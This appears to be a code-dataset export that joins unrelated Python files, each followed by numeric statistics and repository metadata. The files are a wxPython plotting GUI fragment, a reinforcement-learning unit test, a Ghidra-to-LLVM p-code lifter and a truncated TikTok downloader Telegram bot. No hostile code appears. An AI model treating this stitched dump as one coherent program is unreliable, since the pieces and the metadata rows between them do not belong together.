local_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', q))
putter = q + '.sh'
sftp = copyFile(ssh, putter, local_dir, calc_dir)
remote_file = os.path.join(calc_dir, putter)
stdout, stderr = runCommand(ssh, 'bash ' + remote_file + ' -d=' + calc_dir)
mbox.JobSubmit(q, ('\n'.join(stdout.readlines()), '\n'.join(stderr.readlines())))
removeFile(sftp, remote_file)
ssh.close()
def plotBtnPress(self, event):
if self.noteBook.GetSelection() == 0:
self.plot_property()
else:
self.plot_correlation()
def plot_property(self):
# plot options - get all the data to plot
ptype = self.propType.GetItems()[self.propType.GetSelection()]
pchoice = self.propChoice.GetItems()[self.propChoice.GetSelection()]
data_class = self.propChoices.dataClass(ptype, pchoice)
leg = [self.calcList.GetItemText(i) for i in getListCtrlSelection(self.calcList)]
t1 = time.clock()
plot_data = interface.getData(ptype, data_class, leg,
[self.calcs[i] for i in getListCtrlSelection(self.calcList)])
self.SetStatusText('Calculation time: %7.2f s.' % (time.clock() - t1))
msg = plot_data
try:
self.plot_frame.Raise()
except (AttributeError, wx.PyDeadObjectError):
self.plot_frame = PlotFuncFrame(self)
self.plot_frame.Show()
pub.sendMessage('data.plot', message=msg)
def plot_correlation(self):
# correlate options - get all the data to plot
xchoice = self.xCorr.GetSelection()
ychoice = self.yCorr.GetSelection()
leg = [self.calcList.GetItemText(i) for i in getListCtrlSelection(self.calcList)]
data, info = interface.getCorr(xchoice, ychoice, [self.calcs[i] for i in getListCtrlSelection(self.calcList)])
msg = [leg, data, info]
try:
self.plot_frame.Raise()
except (AttributeError, wx.PyDeadObjectError):
self.plot_frame = PlotCorrFrame(self)
self.plot_frame.Show()
pub.sendMessage('corr.plot', message=msg)
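# Hedged launcher sketch (not part of the original file): classic wxPython /
# Python 2 style to match the imports above; assumes the shs package layout
# so RootGUI and the dialogs resolve.
#
#   if __name__ == '__main__':
#       app = wx.App(False)
#       frame = RootFrame(None)
#       frame.Show()
#       app.MainLoop()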
| 39.01476
| 120
| 0.608909
| 1,240
| 10,573
| 5.083871
| 0.243548
| 0.028553
| 0.012373
| 0.017767
| 0.215419
| 0.189245
| 0.16894
| 0.14118
| 0.126904
| 0.111675
| 0
| 0.005157
| 0.284782
| 10,573
| 270
| 121
| 39.159259
| 0.828485
| 0.127873
| 0
| 0.160804
| 0
| 0
| 0.027796
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075377
| false
| 0
| 0.080402
| 0
| 0.21608
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5dc3b0ac30486b996b5ad01fe0ad1a247834e86
| 1,411
|
py
|
Python
|
srl/simulation_test.py
|
google/simple-reinforcement-learning
|
9bdac29427cd5c556d7ea7531b807645f043aae3
|
[
"Apache-2.0"
] | 60
|
2017-01-10T06:35:11.000Z
|
2020-12-19T07:33:40.000Z
|
srl/simulation_test.py
|
google/simple-reinforcement-learning
|
9bdac29427cd5c556d7ea7531b807645f043aae3
|
[
"Apache-2.0"
] | null | null | null |
srl/simulation_test.py
|
google/simple-reinforcement-learning
|
9bdac29427cd5c556d7ea7531b807645f043aae3
|
[
"Apache-2.0"
] | 29
|
2017-01-11T22:15:36.000Z
|
2022-03-17T02:17:37.000Z
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import unittest
from srl import movement
from srl import simulation
from srl import world
class TestSimulation(unittest.TestCase):
def test_in_terminal_state(self):
w = world.World.parse('@^')
sim = simulation.Simulation(world.Static(w))
self.assertFalse(sim.in_terminal_state)
sim.act(movement.ACTION_RIGHT)
self.assertTrue(sim.in_terminal_state)
def test_act_accumulates_score(self):
w = world.World.parse('@.')
sim = simulation.Simulation(world.Static(w))
sim.act(movement.ACTION_RIGHT)
sim.act(movement.ACTION_LEFT)
self.assertEqual(-2, sim.score)
def test_to_array(self):
w = world.World.parse('$.@^#')
sim = simulation.Simulation(world.Static(w))
self.assertTrue(
(np.array([[2, 3, 4, 5, 1]], dtype=np.int8) == sim.to_array())
.all())
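# Hedged addition: a conventional direct-run entry point (the project may
# instead rely on a test runner or unittest discovery):
if __name__ == '__main__':
  unittest.main()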
| 32.068182
| 74
| 0.722892
| 207
| 1,411
| 4.850242
| 0.487923
| 0.059761
| 0.038845
| 0.044821
| 0.222112
| 0.172311
| 0.172311
| 0.172311
| 0.172311
| 0.172311
| 0
| 0.012766
| 0.167257
| 1,411
| 43
| 75
| 32.813953
| 0.841702
| 0.388377
| 0
| 0.208333
| 0
| 0
| 0.010601
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.125
| false
| 0
| 0.208333
| 0
| 0.375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5dc76ad37d386c3045e8ed5404e25dd2364d605
| 26,564
|
py
|
Python
|
src/xmltollvm.py
|
Tejvinder/thesis-ghidra
|
2e59bc48d6bb820ecf6b390e5cf5893fc6ea0216
|
[
"MIT"
] | 101
|
2019-10-22T09:48:19.000Z
|
2022-03-30T07:03:40.000Z
|
src/xmltollvm.py
|
Tejvinder/thesis-ghidra
|
2e59bc48d6bb820ecf6b390e5cf5893fc6ea0216
|
[
"MIT"
] | 4
|
2020-03-06T14:18:47.000Z
|
2021-11-05T04:10:59.000Z
|
src/xmltollvm.py
|
Tejvinder/thesis-ghidra
|
2e59bc48d6bb820ecf6b390e5cf5893fc6ea0216
|
[
"MIT"
] | 15
|
2019-10-22T13:12:39.000Z
|
2022-03-04T20:08:06.000Z
|
from llvmlite import ir
import xml.etree.ElementTree as et
int32 = ir.IntType(32)
int64 = ir.IntType(64)
int1 = ir.IntType(1)
void_type = ir.VoidType()
function_names = []
registers, functions, uniques, extracts = {}, {}, {}, {}
internal_functions = {}
memory = {}
flags = ["ZF", "CF", "OF", "SF"]
pointers = ["RSP", "RIP", "RBP", "EBP", "ESP"]
def lift(filename):
root = et.parse(filename).getroot()
module = ir.Module(name="lifted")
for register in root.find('globals').findall('register'):
if register.get('name') in flags:
var = ir.GlobalVariable(module, ir.IntType(1), register.get('name'))
var.initializer = ir.Constant(ir.IntType(1), None)
var.linkage = 'internal'
registers[register.get('name')] = var
elif register.get('name') in pointers:
var = ir.GlobalVariable(module, ir.PointerType(ir.IntType(8)), register.get('name'))
var.initializer = ir.Constant(ir.PointerType(ir.IntType(8)), None)
var.linkage = 'internal'
registers[register.get('name')] = var
else:
var = ir.GlobalVariable(module, ir.IntType(8 * int(register.get('size'))), register.get('name'))
var.initializer = ir.Constant(ir.IntType(8 * int(register.get('size'))), None)
var.linkage = 'internal'
registers[register.get('name')] = var
for memory_location in root.find('memory').findall('memory'):
var = ir.GlobalVariable(module, ir.IntType(8 * int(memory_location.get('size'))), memory_location.get('name'))
var.initializer = ir.Constant(ir.IntType(8 * int(memory_location.get('size'))), None)
var.linkage = 'internal'
memory[memory_location.get('name')] = var
func_return = ir.VoidType()
fnty = ir.FunctionType(func_return, [])
ir_func = ir.Function(module, fnty, "intra_function_branch")
internal_functions["intra_function_branch"] = ir_func
func_return = ir.VoidType()
fnty = ir.FunctionType(func_return, [])
ir_func = ir.Function(module, fnty, "call_indirect")
internal_functions["call_indirect"] = ir_func
func_return = ir.VoidType()
fnty = ir.FunctionType(func_return, [])
ir_func = ir.Function(module, fnty, "bit_extraction")
internal_functions["bit_extraction"] = ir_func
for function in root.findall('function'):
name = function.get('name')
x = 1
while name in function_names:
name = name + "_" + str(x)
x += 1
function_names.append(name)
address = function.get('address')
functions[address] = [build_function(name, module), function]
for address in functions:
ir_func, function = functions[address]
populate_func(ir_func, function)
return module
def populate_func(ir_func, function):
builders, blocks = build_cfg(function, ir_func)
if blocks == {}:
return
populate_cfg(function, builders, blocks)
def build_function(name, module):
func_return = ir.VoidType()
fnty = ir.FunctionType(func_return, [])
ir_func = ir.Function(module, fnty, name)
return ir_func
def build_cfg(function, ir_func):
builders, blocks = {}, {}
instructions = function.find("instructions")
if instructions:
block = ir_func.append_basic_block("entry")
blocks["entry"] = block
builders["entry"] = ir.IRBuilder(block)
for instruction in instructions:
address = instruction.find("address").text
block = ir_func.append_basic_block(address)
blocks[address] = block
builders[address] = ir.IRBuilder(block)
return builders, blocks
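# Sketch of what build_cfg returns (addresses come from the XML export; the
# ones shown here are placeholders, not from any real dump):
#
#   builders, blocks = build_cfg(function_element, ir_func)
#   # blocks   == {"entry": <ir.Block>, "0x401000": <ir.Block>, ...}
#   # builders == {"entry": <ir.IRBuilder>, "0x401000": <ir.IRBuilder>, ...}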
# noinspection DuplicatedCode
def populate_cfg(function, builders, blocks):
builder = builders["entry"]
stack_size = 10 * 1024 * 1024
stack = builder.alloca(ir.IntType(8), stack_size, name="stack")
stack_top = builder.gep(stack, [ir.Constant(int64, stack_size - 8)], name="stack_top")
builder.store(stack_top, registers["RSP"])
builder.branch(list(blocks.values())[1])
block_iterator = 1
instr = 0
quiter = False
for instruction in function.find("instructions"):
if quiter:
break
address = instruction.find("address").text
if address in builders:
builder = builders[address]
pcodes = instruction.find("pcodes")
pc = 0
no_branch = True
for pcode in pcodes:
pc += 1
mnemonic = pcode.find("name")
if mnemonic.text == "COPY":
output = pcode.find("output")
if output.text in flags and pcode.find("input_0").get("storage") == "constant":
source = ir.Constant(ir.IntType(1), int(pcode.find("input_0").text, 0))
else:
source = fetch_input_varnode(builder, pcode.find("input_0"))
update_output(builder, pcode.find("output"), source)
elif mnemonic.text == "LOAD":
input_1 = pcode.find("input_1")
output = pcode.find("output")
rhs = fetch_input_varnode(builder, input_1)
if input_1.get("storage") == "unique" and output.get("storage") == "unique":
# This is incorrect. This is treating it as a copy, should load the memory address in the input 1
update_output(builder, output, rhs)
else:
if input_1.text in pointers:
rhs = builder.gep(rhs, [ir.Constant(int64, 0)])
result = builder.load(rhs)
update_output(builder, output, result)
elif mnemonic.text == "STORE":
input_1 = pcode.find("input_1") # target
input_2 = pcode.find("input_2") # source
rhs = fetch_input_varnode(builder, input_2)
lhs = fetch_output_varnode(input_1)
lhs2 = builder.gep(lhs, [ir.Constant(int64, 0)])
if lhs2.type != rhs.type.as_pointer():
lhs2 = builder.bitcast(lhs2, rhs.type.as_pointer())
builder.store(rhs, lhs2)
elif mnemonic.text == "BRANCH":
value = pcode.find("input_0").text[2:-2]
if value in functions:
target = functions[value][0]
builder.call(target, [])
elif value in blocks:
target = blocks[value]
builder.branch(target)
no_branch = False
else:
# weird jump into some label in another function
# might be solved with callbr instruction?
builder.call(internal_functions["intra_function_branch"], [])
elif mnemonic.text == "CBRANCH":
true_target = blocks[pcode.find("input_0").text[2:-2]]
false_target = list(blocks.values())[block_iterator + 1]
condition = fetch_input_varnode(builder, pcode.find("input_1"))
no_branch = False
builder.cbranch(condition, true_target, false_target)
elif mnemonic.text == "BRANCHIND":
no_branch = False
target = fetch_input_varnode(builder, pcode.find("input_0"))
if not target.type.is_pointer:
target = builder.inttoptr(target, target.type.as_pointer())
builder.branch_indirect(target)
elif mnemonic.text == "CALL":
target = functions[pcode.find("input_0").text[2:-2]][0]
builder.call(target, [])
elif mnemonic.text == "CALLIND":
# target = pcode.find("input_0").text[2:-2]
builder.call(internal_functions["call_indirect"], [])
elif mnemonic.text == "USERDEFINED":
raise Exception("Not implemented")
elif mnemonic.text == "RETURN":
input_1 = pcode.find("input_1")
no_branch = False
if input_1 is None:
builder.ret_void()
else:
raise Exception("Return value being passed")
elif mnemonic.text == "PIECE":
raise Exception("PIECE operation needs to be tested")
elif mnemonic.text == "SUBPIECE":
output = pcode.find("output")
input_0 = pcode.find("input_0")
input_1 = pcode.find("input_1")
if input_1.text == "0x0":
val = fetch_input_varnode(builder, input_0)
result = builder.trunc(val, ir.IntType(int(output.get("size")) * 8))
update_output(builder, output, result)
else:
builder.call(internal_functions['bit_extraction'], [])
elif mnemonic.text == "INT_EQUAL":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_unsigned('==', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_NOTEQUAL":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_unsigned('!=', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_LESS":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_unsigned('<', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_SLESS":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_signed('<', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_LESSEQUAL":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_unsigned('<=', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_SLESS_EQUAL":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.icmp_signed('<=', lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_ZEXT":
rhs = fetch_input_varnode(builder, pcode.find("input_0"))
if rhs.type.is_pointer:
rhs = builder.ptrtoint(rhs, rhs.type.pointee)
output = builder.zext(rhs, ir.IntType(int(pcode.find("output").get("size")) * 8))
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_SEXT":
rhs = fetch_input_varnode(builder, pcode.find("input_0"))
if rhs.type.is_pointer:
rhs = builder.ptrtoint(rhs, rhs.type.pointee)
output = builder.sext(rhs, ir.IntType(int(pcode.find("output").get("size")) * 8))
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_ADD":
input_0 = pcode.find("input_0")
input_1 = pcode.find("input_1")
lhs = fetch_input_varnode(builder, input_0)
rhs = fetch_input_varnode(builder, input_1)
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
if input_0.text in pointers and input_1.get("storage") == "constant":
result = builder.gep(lhs, [ir.Constant(int64, int(input_1.text, 16))])
else:
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
result = builder.add(lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_SUB":
input_0 = pcode.find("input_0")
input_1 = pcode.find("input_1")
lhs = fetch_input_varnode(builder, input_0)
rhs = fetch_input_varnode(builder, input_1)
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
if input_0.text in pointers and input_1.get("storage") == "constant":
result = builder.gep(lhs, [ir.Constant(int64, -int(input_1.text, 16))])
else:
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
result = builder.sub(lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_CARRY":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.uadd_with_overflow(lhs, rhs)
result = builder.extract_value(result, 1)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_SCARRY":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
result = builder.sadd_with_overflow(lhs, rhs)
result = builder.extract_value(result, 1)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_SBORROW":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
lhs, rhs = int_comparison_check_inputs(builder, lhs, rhs)
                    # INT_SBORROW is signed-subtraction overflow, not addition
                    result = builder.ssub_with_overflow(lhs, rhs)
result = builder.extract_value(result, 1)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_2COMP":
val = fetch_input_varnode(builder, pcode.find("input_0"))
result = builder.not_(val)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_NEGATE":
val = fetch_input_varnode(builder, pcode.find("input_0"))
result = builder.neg(val)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "INT_XOR":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.xor(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_AND":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.and_(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_OR":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.or_(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_LEFT":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = check_shift_inputs(builder, lhs, rhs, target)
output = builder.shl(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_RIGHT":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = check_shift_inputs(builder, lhs, rhs, target)
output = builder.lshr(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_SRIGHT":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = check_shift_inputs(builder, lhs, rhs, target)
output = builder.ashr(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_MULT":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.mul(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_DIV":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
                    output = builder.udiv(lhs, rhs)  # INT_DIV is unsigned; llvmlite provides udiv/sdiv, not div
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_REM":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.urem(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_SDIV":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.sdiv(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "INT_SREM":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
target = ir.IntType(int(pcode.find("output").get("size")) * 8)
lhs, rhs = int_check_inputs(builder, lhs, rhs, target)
output = builder.srem(lhs, rhs)
update_output(builder, pcode.find("output"), output)
elif mnemonic.text == "BOOL_NEGATE":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
result = builder.neg(lhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "BOOL_XOR":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
result = builder.xor(lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "BOOL_AND":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
result = builder.and_(lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "BOOL_OR":
lhs = fetch_input_varnode(builder, pcode.find("input_0"))
rhs = fetch_input_varnode(builder, pcode.find("input_1"))
result = builder.or_(lhs, rhs)
update_output(builder, pcode.find("output"), result)
elif mnemonic.text == "FLOAT_EQUAL":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_NOTEQUAL":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_LESS":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_LESSEQUAL":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_ADD":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_SUB":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_MULT":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_DIV":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_NEG":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_ABS":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_SQRT":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_CEIL":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_FLOOR":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_ROUND":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT_NAN":
raise Exception("Not implemented")
elif mnemonic.text == "INT2FLOAT":
raise Exception("Not implemented")
elif mnemonic.text == "FLOAT2FLOAT":
raise Exception("Not implemented")
elif mnemonic.text == "TRUNC":
raise Exception("Not implemented")
elif mnemonic.text == "CPOOLREF":
raise Exception("Not implemented")
elif mnemonic.text == "NEW":
raise Exception("Not implemented")
elif mnemonic.text == "MULTIEQUAL":
raise Exception("Not implemented")
elif mnemonic.text == "INDIRECT":
raise Exception("Not implemented")
elif mnemonic.text == "PTRADD":
raise Exception("Not implemented")
elif mnemonic.text == "PTRSUB":
raise Exception("Not implemented")
elif mnemonic.text == "CAST":
raise Exception("Not implemented")
else:
raise Exception("Not a standard pcode instruction")
block_iterator += 1
instr += 1
if block_iterator < len(blocks) and no_branch:
builder.branch(list(blocks.values())[block_iterator])
def fetch_input_varnode(builder, name):
var_type = name.get("storage")
var_size = int(name.get("size")) * 8
if var_type == "register":
return builder.load(registers[name.text])
elif var_type == "unique":
        if name.text not in uniques:
raise Exception("Temporary variable referenced before defined")
return uniques[name.text]
elif var_type == "constant":
var = ir.Constant(ir.IntType(var_size), int(name.text, 0))
return var
elif var_type == "memory":
return memory[name.text]
def update_output(builder, name, output):
var_type = name.get("storage")
if var_type == "register":
reg = registers[name.text]
if reg.type != output.type.as_pointer():
reg = builder.bitcast(reg, output.type.as_pointer())
builder.store(output, reg)
elif var_type == "unique":
uniques[name.text] = output
def fetch_output_varnode(name):
var_type = name.get("storage")
if var_type == "register":
return registers[name.text]
elif var_type == "unique":
if name.text not in uniques:
uniques[name.text] = None
return uniques[name.text]
def int_check_inputs(builder, lhs, rhs, target):
if lhs.type != target:
if lhs.type.is_pointer:
lhs2 = lhs
lhs = builder.ptrtoint(lhs, target)
if lhs2 == rhs:
rhs = lhs
if rhs.type != target and lhs != rhs:
if rhs.type.is_pointer:
rhs = builder.ptrtoint(rhs, target)
return lhs, rhs
def check_shift_inputs(builder, lhs, rhs, target):
if lhs.type != target:
if lhs.type.is_pointer:
lhs = builder.ptrtoint(lhs, target)
else:
lhs = builder.zext(lhs, target)
if rhs.type != target:
if rhs.type.is_pointer:
rhs = builder.ptrtoint(rhs, target)
else:
rhs = builder.zext(rhs, target)
return lhs, rhs
def int_comparison_check_inputs(builder, lhs, rhs):
# For integer comparison operations. We assume rhs is the correct type.
if lhs.type.is_pointer:
lhs = builder.ptrtoint(lhs, rhs.type)
return lhs, rhs
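# Hedged usage sketch (not part of the original file): 'program.xml' is a
# placeholder path for an XML export produced by the matching Ghidra script.
#
#   from xmltollvm import lift
#   module = lift('program.xml')  # returns an llvmlite ir.Module
#   print(module)                 # textual LLVM IR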
| 49.932331
| 118
| 0.571074
| 3,003
| 26,564
| 4.885115
| 0.084582
| 0.07362
| 0.092706
| 0.101431
| 0.730539
| 0.675596
| 0.651738
| 0.599932
| 0.537014
| 0.510907
| 0
| 0.010864
| 0.306994
| 26,564
| 532
| 119
| 49.932331
| 0.786029
| 0.012686
| 0
| 0.46856
| 0
| 0
| 0.094969
| 0.002403
| 0
| 0
| 0.000114
| 0
| 0
| 1
| 0.022312
| false
| 0.002028
| 0.004057
| 0
| 0.052738
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5dfc52594a99b2ee5b9d8578f257b3fdecb0fcf
| 4,726
|
py
|
Python
|
bot.py
|
tiianprb/TikTok-Downloader-Bot
|
91b6fd64d5a151c3e439772c69850a18b7562ceb
|
[
"MIT"
] | null | null | null |
bot.py
|
tiianprb/TikTok-Downloader-Bot
|
91b6fd64d5a151c3e439772c69850a18b7562ceb
|
[
"MIT"
] | null | null | null |
bot.py
|
tiianprb/TikTok-Downloader-Bot
|
91b6fd64d5a151c3e439772c69850a18b7562ceb
|
[
"MIT"
] | null | null | null |
import json, requests, os, shlex, asyncio, uuid, shutil
from typing import Tuple
from pyrogram import Client, filters
from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery
# Configs
API_HASH = os.environ['API_HASH']
APP_ID = int(os.environ['APP_ID'])
BOT_TOKEN = os.environ['BOT_TOKEN']
downloads = './downloads/{}/'
# Buttons
START_BUTTONS=[
[
InlineKeyboardButton('Source', url='https://github.com/X-Gorn/TikTokDL'),
InlineKeyboardButton('Project Channel', url='https://t.me/xTeamBots'),
],
[InlineKeyboardButton('Author', url='https://t.me/xgorn')],
]
DL_BUTTONS=[
[
InlineKeyboardButton('No Watermark', callback_data='nowm'),
InlineKeyboardButton('Watermark', callback_data='wm'),
],
[InlineKeyboardButton('Audio', callback_data='audio')],
]
# Running bot
xbot = Client('TikTokDL', api_id=APP_ID, api_hash=API_HASH, bot_token=BOT_TOKEN)
# Helpers
# Thanks to FridayUB
async def run_cmd(cmd: str) -> Tuple[str, str, int, int]:
args = shlex.split(cmd)
process = await asyncio.create_subprocess_exec(
*args, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await process.communicate()
return (
stdout.decode("utf-8", "replace").strip(),
stderr.decode("utf-8", "replace").strip(),
process.returncode,
process.pid,
)
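# Hedged usage sketch for run_cmd (placeholder command; must be awaited
# from within a coroutine):
#
#   out, err, returncode, pid = await run_cmd('ffmpeg -version')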
# Start
@xbot.on_message(filters.command('start') & filters.private)
async def _start(bot, update):
await update.reply_text(f"I'm TikTokDL!\nYou can download tiktok video/audio using this bot", True, reply_markup=InlineKeyboardMarkup(START_BUTTONS))
# Downloader for tiktok
@xbot.on_message(filters.regex(pattern='.*http.*') & filters.private)
async def _tiktok(bot, update):
url = update.text
session = requests.Session()
resp = session.head(url, allow_redirects=True)
    if 'tiktok.com' not in resp.url:
return
await update.reply('Select the options below', True, reply_markup=InlineKeyboardMarkup(DL_BUTTONS))
# Callbacks
@xbot.on_callback_query()
async def _callbacks(bot, cb: CallbackQuery):
if cb.data == 'nowm':
dirs = downloads.format(uuid.uuid4().hex)
os.makedirs(dirs)
cbb = cb
update = cbb.message.reply_to_message
await cb.message.delete()
url = update.text
session = requests.Session()
resp = session.head(url, allow_redirects=True)
if '?' in resp.url:
tt = resp.url.split('?', 1)[0]
else:
tt = resp.url
ttid = dirs+tt.split('/')[-1]
r = requests.get('https://api.reiyuura.me/api/dl/tiktok?url='+tt)
